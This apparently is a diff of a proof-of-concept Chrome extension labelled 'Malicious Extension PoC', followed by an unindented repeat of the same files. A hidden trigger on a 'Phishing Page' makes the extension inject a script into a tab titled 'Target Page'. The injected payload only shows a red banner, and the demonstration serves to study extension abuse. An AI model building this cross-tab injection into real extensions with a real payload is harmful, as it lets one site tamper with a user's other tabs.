felmoltor · July 3, 2025 10:48
diff --git a/background.js b/background.js
 chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
    console.log("Background script received message:", message);
  if (message.action === "inject_poc") {
    chrome.tabs.query({}, function(tabs) {
      const targetTab = tabs.find(tab => tab.title.includes("Target Page"));
      if (targetTab) {
        chrome.scripting.executeScript({
          target: { tabId: targetTab.id },
          files: ["injected.js"]
        });
        sendResponse({ status: "Injected into tab ID " + targetTab.id });
      } else {
        sendResponse({ status: "Target tab not found" });
      }
    });
    return true; // indicates async response
  }
 });
diff --git a/content.js b/content.js
 // Look for a special DOM signal
 const btn = document.getElementById("inject");

 btn.addEventListener("click", () => {
    const marker = document.getElementById("magic_inject_trigger");
  if (marker) {
    console.log("Injecting content into the 'Target Tab'.");
    chrome.runtime.sendMessage({ action: "inject_poc" });
  }
 });

 btn.click(); // Automatically click the button to trigger the injection
 console.log("Content script loaded and button clicked.");
diff --git a/injected.js b/injected.js
 (() => {
  const h1 = document.createElement("h1");
  h1.innerText = "Hello from the malicious extension!";
  h1.style.color = "white";
  h1.style.background = "red";
  h1.style.padding = "10px";
  h1.style.position = "fixed";
  h1.style.top = "0";
  h1.style.left = "0";
  h1.style.zIndex = "9999";
  document.body.prepend(h1);
  console.log("Injected script executed");
 })();
diff --git a/manifest.json b/manifest.json
 {
  "manifest_version": 3,
  "name": "Malicious Extension PoC",
  "version": "1.0",
  "description": "PoC extension that modifies other tabs",
  "permissions": [
    "tabs",
    "scripting"
  ],
  "host_permissions": [
    "<all_urls>"
  ],
  "background": {
    "service_worker": "background.js"
  },
  "action": {
    "default_popup": "poc.html"
  },
  "web_accessible_resources": [
    {
      "resources": ["content.js","injected.js"],
      "matches": ["<all_urls>"]
    }
  ],
  "content_scripts": [
    {
        "matches": ["<all_urls>"],
        "js": ["content.js"],
        "run_at": "document_idle"
    }
  ]
 }
diff --git a/poc.html b/poc.html
 <!DOCTYPE html>
 <html>
 <head>
  <title>Phishing Page</title>
 </head>
 <body>
    <!-- just an innocent-looking page that includes the trigger -->
    <div id="magic_inject_trigger" style="display: none"></div>
    <button id="inject" style="display: none"></button>

  <h1>Phishing Page</h1>
  <img src="imin.png" width="150px"></img>

 </body>
 </html>
diff --git a/target.html b/target.html
 <html>
    <head>
        <title>Target Page</title>
    </head>
    <body>
        <h1>Target Page</h1>
        <p>This is the target page where the script will be injected.</p>
    </body>
 </html>
	chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
	console.log("Background script received message:", message);
	if (message.action === "inject_poc") {
	chrome.tabs.query({}, function(tabs) {
	const targetTab = tabs.find(tab => tab.title.includes("Target Page"));
	if (targetTab) {
	chrome.scripting.executeScript({
	target: { tabId: targetTab.id },
	files: ["injected.js"]
	});
	sendResponse({ status: "Injected into tab ID " + targetTab.id });
	} else {
	sendResponse({ status: "Target tab not found" });
	}
	});
	return true; // indicates async response
	}
	});
	// Look for a special DOM signal
	const btn = document.getElementById("inject");

	btn.addEventListener("click", () => {
	const marker = document.getElementById("magic_inject_trigger");
	if (marker) {
	console.log("Injecting content into the 'Target Tab'.");
	chrome.runtime.sendMessage({ action: "inject_poc" });
	}
	});

	btn.click(); // Automatically click the button to trigger the injection
	console.log("Content script loaded and button clicked.");
	(() => {
	const h1 = document.createElement("h1");
	h1.innerText = "Hello from the malicious extension!";
	h1.style.color = "white";
	h1.style.background = "red";
	h1.style.padding = "10px";
	h1.style.position = "fixed";
	h1.style.top = "0";
	h1.style.left = "0";
	h1.style.zIndex = "9999";
	document.body.prepend(h1);
	console.log("Injected script executed");
	})();
	{
	"manifest_version": 3,
	"name": "Malicious Extension PoC",
	"version": "1.0",
	"description": "PoC extension that modifies other tabs",
	"permissions": [
	"tabs",
	"scripting"
	],
	"host_permissions": [
	"<all_urls>"
	],
	"background": {
	"service_worker": "background.js"
	},
	"action": {
	"default_popup": "poc.html"
	},
	"web_accessible_resources": [
	{
	"resources": ["content.js","injected.js"],
	"matches": ["<all_urls>"]
	}
	],
	"content_scripts": [
	{
	"matches": ["<all_urls>"],
	"js": ["content.js"],
	"run_at": "document_idle"
	}
	]
	}
	<!DOCTYPE html>
	<html>
	<head>
	<title>Phishing Page</title>
	</head>
	<body>
	<!-- just an innocent-looking page that includes the trigger -->
	<div id="magic_inject_trigger" style="display: none"></div>
	<button id="inject" style="display: none"></button>

	<h1>Phishing Page</h1>
	<img src="imin.png" width="150px"></img>

	</body>
	</html>
	<html>
	<head>
	<title>Target Page</title>
	</head>
	<body>
	<h1>Target Page</h1>
	<p>This is the target page where the script will be injected.</p>
	</body>
	</html>